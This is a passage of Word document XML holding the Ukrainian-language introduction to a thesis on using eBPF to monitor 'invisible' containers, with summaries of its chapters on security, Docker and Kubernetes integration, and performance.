      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>інфраструктурами</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, зокрема в контексті безпеки, моніторингу та оптимізації продуктивності. Сьогоднішні ІТ-системи стають дедалі складнішими, а вимоги до їх гнучкості, ефективності та безпеки зростають. Це спричиняє необхідність розробки нових підходів до моніторингу і керування контейнерами, особливо в умовах </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>мікросервісних</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>архітектур</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та хмарних середовищ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE094C" w:rsidRPr="00DE094C" w:rsidRDefault="00DE094C" w:rsidP="00DE094C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Однією з ключових проблем є недостатня видимість і контроль над контейнерами, особливо коли вони працюють в умовах автоматизації та високої динамічності, що характерно для таких підходів, як функції без сервера або самокеровані контейнери. Ці </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>невидимі контейнери</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> можуть бути складними для відстеження традиційними засобами моніторингу, що створює ризики для безпеки та ускладнює діагностику проблем у системах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE094C" w:rsidRPr="00DE094C" w:rsidRDefault="00DE094C" w:rsidP="00DE094C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">У цьому контексті технологія </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>extended</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Berkeley</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">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Packet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Filter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> надає потужні можливості для моніторингу та управління на рівні ядра операційної системи. Використання </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> дозволяє отримати глибокий доступ до системних викликів, мережевих потоків та файлових операцій без необхідності втручатися в роботу контейнерів. Такий підхід дозволяє забезпечити ефективний контроль за </w:t>
      </w:r>
      <w:r w:rsidR="00EB5FBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“невидимими</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> контейнерами</w:t>
      </w:r>
      <w:r w:rsidR="00EB5FBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, підвищити безпеку та оперативність реагування на загрози, а також зменшити вплив на продуктивність системи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE094C" w:rsidRPr="00DE094C" w:rsidRDefault="00DE094C" w:rsidP="00DE094C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Актуальність цього дослідження полягає в тому, що технологія </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> дає можливість створити інноваційні системи моніторингу та аудиту, які дозволяють спостерігати за діяльністю контейнерів на низькому рівні, не порушуючи їх ізольовану природу. Це відкриває нові горизонти для ефективного управління </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>контейнеризованими</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> середовищами, зокрема для </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>застосувань, де традиційні методи моніторингу є недостатньо ефективними або навіть непридатними для виявлення підозрілих чи аномальних дій.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172EF0" w:rsidRPr="00DE094C" w:rsidRDefault="00DE094C" w:rsidP="00DE094C">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DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким чином, дослідження інтеграції </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> у побудову </w:t>
      </w:r>
      <w:r w:rsidR="00EB5FBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“невидимих</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> контейнерів</w:t>
      </w:r>
      <w:r w:rsidR="00EB5FBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> є важливим кроком до розв</w:t>
      </w:r>
      <w:r w:rsidR="00EB5FBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>язання проблем безпеки, прозорості та масштабованості сучасних ІТ-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>архітектур</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DE094C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, що використовуються в умовах високої динамічності та складності.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007434F7" w:rsidRDefault="007434F7" w:rsidP="007434F7">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7434F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Метою</w:t>
      </w:r>
      <w:r w:rsidRPr="007434F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> даної </w:t>
      </w:r>
      <w:r w:rsidRPr="007434F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>роботи</w:t>
      </w:r>
      <w:r w:rsidRPr="007434F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> є дослідження та розробка процесу інтеграції технології</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007434F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>extende</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>d Berkeley Packet Filter для побудови та моніторингу невидимих контейнерів</w:t>
      </w:r>
      <w:r w:rsidRPr="007434F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в сучасних ІТ-системах. Це дозволить значно підвищити ефективність, безпеку та масштабованість контейнерних інфраструктур.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007434F7" w:rsidRDefault="007434F7" w:rsidP="007434F7">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7434F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Таким чином, основна мета роботи полягає в створенні ефективної та безпечної інфраструктури для моніторингу та управління контейнерами на основі технології eBPF, що дозволить вирішити існуючі проблеми з безпекою, прозорістю та управлінськими можливостями у складних контейнеризованих середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007434F7" w:rsidRDefault="00ED7EED" w:rsidP="00ED7EED">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ED7EED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>У першому розділі ро</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>зглядаються основи технології eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7EED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, її принципи роботи, роль у системах безпеки та моніторингу, а також застосування для контейнерів. Описано, як eBPF інтегрується з ядром операційної системи, дозволяючи виконувати програми без зміни ядра, що забезпечує ефективний низькорівневий моніторинг системи. Крім того, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>висвітлено</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7EED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> концепцію контейнеризації та проблеми безпеки, зокрема для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“невидимих контейнерів”</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7EED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, які складно мо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ніторити традиційними методами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4CE1" w:rsidRPr="009A4CE1" w:rsidRDefault="009A4CE1" w:rsidP="009A4CE1">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630137">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Другий розділ кваліфікаційної роботи присвячений</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A4CE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>сумісн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ості технології eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="009A4CE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> з різними платформами та інструментами безпеки, зокрема в контексті контейнеризації. Окрему увагу приділено технічним обмеженням, можливостям інтеграції з попул</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ярними платформами, такими як Docker та Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="009A4CE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, а також побудові стелс-контейнерів для постексплуатаційного моніторингу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A4CE1" w:rsidRDefault="009A4CE1" w:rsidP="009A4CE1">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9A4CE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Третій розділ роботи присвячений оці</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>нці продуктивності інтеграції eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="009A4CE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнерні системи та аналізу сценаріїв навантаження. Розглядаються конкретні </w:t>
      </w:r>
